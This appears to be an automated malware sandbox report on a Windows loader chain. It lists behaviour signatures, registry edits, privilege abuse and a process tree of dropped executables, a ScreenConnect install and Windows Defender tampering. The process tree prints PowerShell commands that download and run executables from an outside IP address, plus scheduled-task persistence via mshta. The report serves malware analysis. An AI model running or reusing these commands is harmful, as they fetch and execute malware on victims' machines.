\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F25BFF7E7E302AB93DA7902434EC5F36 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\91b7d375130f294a\\" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-91b7d375130f294a\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\ProductIcon = "C:\\Windows\\Installer\\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\\DefaultIcon" msiexec.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4692 schtasks.exe 5824 schtasks.exe 5008 schtasks.exe 2040 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 684 apisysDirectx.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4524 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 4524 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 1456 skotes.exe 1456 skotes.exe 3528 f3Ypd8O.exe 3528 f3Ypd8O.exe 3528 f3Ypd8O.exe 3528 f3Ypd8O.exe 4072 kdMujZh.exe 4072 kdMujZh.exe 4072 kdMujZh.exe 4072 kdMujZh.exe 1460 bxvt.exe 1460 bxvt.exe 3908 MAl7pjE.exe 3908 MAl7pjE.exe 3908 MAl7pjE.exe 3908 MAl7pjE.exe 3908 MAl7pjE.exe 3908 MAl7pjE.exe 3704 sQ3DZPU.exe 3704 sQ3DZPU.exe 1060 powershell.exe 1060 powershell.exe 1060 powershell.exe 3948 powershell.exe 3948 powershell.exe 4464 msiexec.exe 4464 msiexec.exe 3948 powershell.exe 3340 TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE 3340 TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE 4872 d88b7e7413.exe 4872 d88b7e7413.exe 3284 ScreenConnect.ClientService.exe 3284 ScreenConnect.ClientService.exe 3340 TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE 3340 TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE 3340 TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE 4508 powershell.exe 4508 powershell.exe 3284 ScreenConnect.ClientService.exe 3284 ScreenConnect.ClientService.exe 3284 ScreenConnect.ClientService.exe 3284 ScreenConnect.ClientService.exe 4508 powershell.exe 4504 8380fa5fb3.exe 4504 8380fa5fb3.exe 4388 powershell.exe 4388 powershell.exe 4388 powershell.exe 3028 powershell.exe 3028 powershell.exe 3028 powershell.exe 5208 b95bc460f0.exe 5208 b95bc460f0.exe 5208 b95bc460f0.exe 5208 b95bc460f0.exe 5376 483d2fa8a0d53818306efeb32d3.exe 5376 483d2fa8a0d53818306efeb32d3.exe 6000 skotes.exe 6000 skotes.exe 3460 e14cb127ab.exe 3460 e14cb127ab.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3704 sQ3DZPU.exe Token: SeDebugPrivilege 4772 a1EoH8b.exe Token: SeShutdownPrivilege 1224 msiexec.exe Token: SeIncreaseQuotaPrivilege 1224 msiexec.exe Token: SeSecurityPrivilege 4464 msiexec.exe Token: SeCreateTokenPrivilege 1224 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1224 msiexec.exe Token: SeLockMemoryPrivilege 1224 msiexec.exe Token: SeIncreaseQuotaPrivilege 1224 msiexec.exe Token: SeMachineAccountPrivilege 1224 msiexec.exe Token: SeTcbPrivilege 1224 msiexec.exe Token: SeSecurityPrivilege 1224 msiexec.exe Token: SeTakeOwnershipPrivilege 1224 msiexec.exe Token: SeLoadDriverPrivilege 1224 msiexec.exe Token: SeSystemProfilePrivilege 1224 msiexec.exe Token: SeSystemtimePrivilege 1224 msiexec.exe Token: SeProfSingleProcessPrivilege 1224 msiexec.exe Token: SeIncBasePriorityPrivilege 1224 msiexec.exe Token: SeCreatePagefilePrivilege 1224 msiexec.exe Token: SeCreatePermanentPrivilege 1224 msiexec.exe Token: SeBackupPrivilege 1224 msiexec.exe Token: SeRestorePrivilege 1224 msiexec.exe Token: SeShutdownPrivilege 1224 msiexec.exe Token: SeDebugPrivilege 1224 msiexec.exe Token: SeAuditPrivilege 1224 msiexec.exe Token: SeSystemEnvironmentPrivilege 1224 msiexec.exe Token: SeChangeNotifyPrivilege 1224 msiexec.exe Token: SeRemoteShutdownPrivilege 1224 msiexec.exe Token: SeUndockPrivilege 1224 msiexec.exe Token: SeSyncAgentPrivilege 1224 msiexec.exe Token: SeEnableDelegationPrivilege 1224 msiexec.exe Token: SeManageVolumePrivilege 1224 msiexec.exe Token: SeImpersonatePrivilege 1224 msiexec.exe Token: SeCreateGlobalPrivilege 1224 msiexec.exe Token: SeCreateTokenPrivilege 1224 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1224 msiexec.exe Token: SeLockMemoryPrivilege 1224 msiexec.exe Token: SeIncreaseQuotaPrivilege 1224 msiexec.exe Token: SeMachineAccountPrivilege 1224 msiexec.exe Token: SeTcbPrivilege 1224 msiexec.exe Token: SeSecurityPrivilege 1224 msiexec.exe Token: SeTakeOwnershipPrivilege 1224 msiexec.exe Token: SeLoadDriverPrivilege 1224 msiexec.exe Token: SeSystemProfilePrivilege 1224 msiexec.exe Token: SeSystemtimePrivilege 1224 msiexec.exe Token: SeProfSingleProcessPrivilege 1224 msiexec.exe Token: SeIncBasePriorityPrivilege 1224 msiexec.exe Token: SeCreatePagefilePrivilege 1224 msiexec.exe Token: SeCreatePermanentPrivilege 1224 msiexec.exe Token: SeBackupPrivilege 1224 msiexec.exe Token: SeRestorePrivilege 1224 msiexec.exe Token: SeShutdownPrivilege 1224 msiexec.exe Token: SeDebugPrivilege 1224 msiexec.exe Token: SeAuditPrivilege 1224 msiexec.exe Token: SeSystemEnvironmentPrivilege 1224 msiexec.exe Token: SeChangeNotifyPrivilege 1224 msiexec.exe Token: SeRemoteShutdownPrivilege 1224 msiexec.exe Token: SeUndockPrivilege 1224 msiexec.exe Token: SeSyncAgentPrivilege 1224 msiexec.exe Token: SeEnableDelegationPrivilege 1224 msiexec.exe Token: SeManageVolumePrivilege 1224 msiexec.exe Token: SeImpersonatePrivilege 1224 msiexec.exe Token: SeCreateGlobalPrivilege 1224 msiexec.exe Token: SeCreateTokenPrivilege 1224 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4524 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 1224 msiexec.exe 2396 147129d910.exe 2396 147129d910.exe 2396 147129d910.exe 1224 msiexec.exe 5668 amnew.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 2372 chrome.exe 4072 e189d890b8.exe 4072 e189d890b8.exe 4072 e189d890b8.exe 4072 e189d890b8.exe 4072 e189d890b8.exe 4072 e189d890b8.exe 4072 e189d890b8.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 2016 5846e91d4e.exe 2016 5846e91d4e.exe 2016 5846e91d4e.exe -
Suspicious use of SendNotifyMessage 37 IoCs
pid Process 2396 147129d910.exe 2396 147129d910.exe 2396 147129d910.exe 4072 e189d890b8.exe 4072 e189d890b8.exe 4072 e189d890b8.exe 4072 e189d890b8.exe 4072 e189d890b8.exe 4072 e189d890b8.exe 4072 e189d890b8.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 6020 firefox.exe 2016 5846e91d4e.exe 2016 5846e91d4e.exe 2016 5846e91d4e.exe 4072 e189d890b8.exe 4072 e189d890b8.exe 4072 e189d890b8.exe 4072 e189d890b8.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 6020 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4524 wrote to memory of 1456 4524 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 87 PID 4524 wrote to memory of 1456 4524 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 87 PID 4524 wrote to memory of 1456 4524 3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe 87 PID 1456 wrote to memory of 2908 1456 skotes.exe 88 PID 1456 wrote to memory of 2908 1456 skotes.exe 88 PID 1456 wrote to memory of 2908 1456 skotes.exe 88 PID 2908 wrote to memory of 3528 2908 f3Ypd8O.exe 89 PID 2908 wrote to memory of 3528 2908 f3Ypd8O.exe 89 PID 2908 wrote to memory of 3528 2908 f3Ypd8O.exe 89 PID 2908 wrote to memory of 3528 2908 f3Ypd8O.exe 89 PID 2908 wrote to memory of 3528 2908 f3Ypd8O.exe 89 PID 2908 wrote to memory of 3528 2908 f3Ypd8O.exe 89 PID 2908 wrote to memory of 3528 2908 f3Ypd8O.exe 89 PID 2908 wrote to memory of 3528 2908 f3Ypd8O.exe 89 PID 2908 wrote to memory of 3528 2908 f3Ypd8O.exe 89 PID 1456 wrote to memory of 4072 1456 skotes.exe 94 PID 1456 wrote to memory of 4072 1456 skotes.exe 94 PID 1456 wrote to memory of 4072 1456 skotes.exe 94 PID 1456 wrote to memory of 3704 1456 skotes.exe 95 PID 1456 wrote to memory of 3704 1456 skotes.exe 95 PID 1456 wrote to memory of 3704 1456 skotes.exe 95 PID 1456 wrote to memory of 4772 1456 skotes.exe 97 PID 1456 wrote to memory of 4772 1456 skotes.exe 97 PID 1456 wrote to memory of 4772 1456 skotes.exe 97 PID 4772 wrote to memory of 1224 4772 a1EoH8b.exe 98 PID 4772 wrote to memory of 1224 4772 a1EoH8b.exe 98 PID 4772 wrote to memory of 1224 4772 a1EoH8b.exe 98 PID 4464 wrote to memory of 2496 4464 msiexec.exe 101 PID 4464 wrote to memory of 2496 4464 msiexec.exe 101 PID 4464 wrote to memory of 2496 4464 msiexec.exe 101 PID 2496 wrote to memory of 5108 2496 MsiExec.exe 102 PID 2496 wrote to memory of 5108 2496 MsiExec.exe 102 PID 2496 wrote to memory of 5108 2496 MsiExec.exe 102 PID 1456 wrote to memory of 3908 1456 skotes.exe 105 PID 1456 wrote to memory of 3908 1456 skotes.exe 105 PID 1456 wrote to memory of 3908 1456 skotes.exe 105 PID 1456 wrote to memory of 2396 1456 skotes.exe 107 PID 1456 wrote to memory of 2396 1456 skotes.exe 107 PID 1456 wrote to memory of 2396 1456 skotes.exe 107 PID 2396 wrote to memory of 2992 2396 147129d910.exe 108 PID 2396 wrote to memory of 2992 2396 147129d910.exe 108 PID 2396 wrote to memory of 2992 2396 147129d910.exe 108 PID 2396 wrote to memory of 2380 2396 147129d910.exe 109 PID 2396 wrote to memory of 2380 2396 147129d910.exe 109 PID 2396 wrote to memory of 2380 2396 147129d910.exe 109 PID 2380 wrote to memory of 1060 2380 mshta.exe 111 PID 2380 wrote to memory of 1060 2380 mshta.exe 111 PID 2380 wrote to memory of 1060 2380 mshta.exe 111 PID 2992 wrote to memory of 2040 2992 cmd.exe 113 PID 2992 wrote to memory of 2040 2992 cmd.exe 113 PID 2992 wrote to memory of 2040 2992 cmd.exe 113 PID 1456 wrote to memory of 5080 1456 skotes.exe 114 PID 1456 wrote to memory of 5080 1456 skotes.exe 114 PID 1456 wrote to memory of 5080 1456 skotes.exe 114 PID 5080 wrote to memory of 3120 5080 cmd.exe 116 PID 5080 wrote to memory of 3120 5080 cmd.exe 116 PID 5080 wrote to memory of 3120 5080 cmd.exe 116 PID 3120 wrote to memory of 4688 3120 cmd.exe 118 PID 3120 wrote to memory of 4688 3120 cmd.exe 118 PID 3120 wrote to memory of 4688 3120 cmd.exe 118 PID 3120 wrote to memory of 2992 3120 cmd.exe 120 PID 3120 wrote to memory of 2992 3120 cmd.exe 120 PID 3120 wrote to memory of 2992 3120 cmd.exe 120 PID 2992 wrote to memory of 3948 2992 cmd.exe 121 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe"C:\Users\Admin\AppData\Local\Temp\3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 8004⤵
- Program crash
PID:708
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4072
-
-
C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe"C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3704 -
C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
PID:684 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /tn apisysDirectx_11 /tr "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe" /st 14:06 /du 23:59 /sc daily /ri 1 /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe"C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\91b7d375130f294a\ScreenConnect.ClientSetup.msi"4⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1224
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3908
-
-
C:\Users\Admin\AppData\Local\Temp\1089179101\147129d910.exe"C:\Users\Admin\AppData\Local\Temp\1089179101\147129d910.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn n8BfJmabU3X /tr "mshta C:\Users\Admin\AppData\Local\Temp\VqNz4ZY9t.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn n8BfJmabU3X /tr "mshta C:\Users\Admin\AppData\Local\Temp\VqNz4ZY9t.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2040
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\VqNz4ZY9t.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'U3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
PID:1060 -
C:\Users\Admin\AppData\Local\TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE"C:\Users\Admin\AppData\Local\TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3340
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- Delays execution with timeout.exe
PID:4688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3948
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:4692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:4460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4388
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "tTdc5masekn" /tr "mshta \"C:\Temp\dozGgrJQn.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4692
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\dozGgrJQn.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3028 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5376
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089272001\d88b7e7413.exe"C:\Users\Admin\AppData\Local\Temp\1089272001\d88b7e7413.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4872 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:5800
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089273001\8380fa5fb3.exe"C:\Users\Admin\AppData\Local\Temp\1089273001\8380fa5fb3.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4504
-
-
C:\Users\Admin\AppData\Local\Temp\1089274001\b95bc460f0.exe"C:\Users\Admin\AppData\Local\Temp\1089274001\b95bc460f0.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5208 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 15364⤵
- Program crash
PID:4924
-
-
-
C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:5668 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:5764 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"5⤵
- Executes dropped EXE
PID:2376 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4640
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5884 -
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"6⤵
- Executes dropped EXE
PID:2040
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"6⤵
- Executes dropped EXE
PID:2968
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 8446⤵
- Program crash
PID:6036
-
-
-
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6104 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5200
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 9686⤵
- Program crash
PID:5368
-
-
-
C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"5⤵
- Executes dropped EXE
PID:5336
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1580 -
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"6⤵
- Executes dropped EXE
PID:4452
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"6⤵
- Executes dropped EXE
PID:2220
-
-
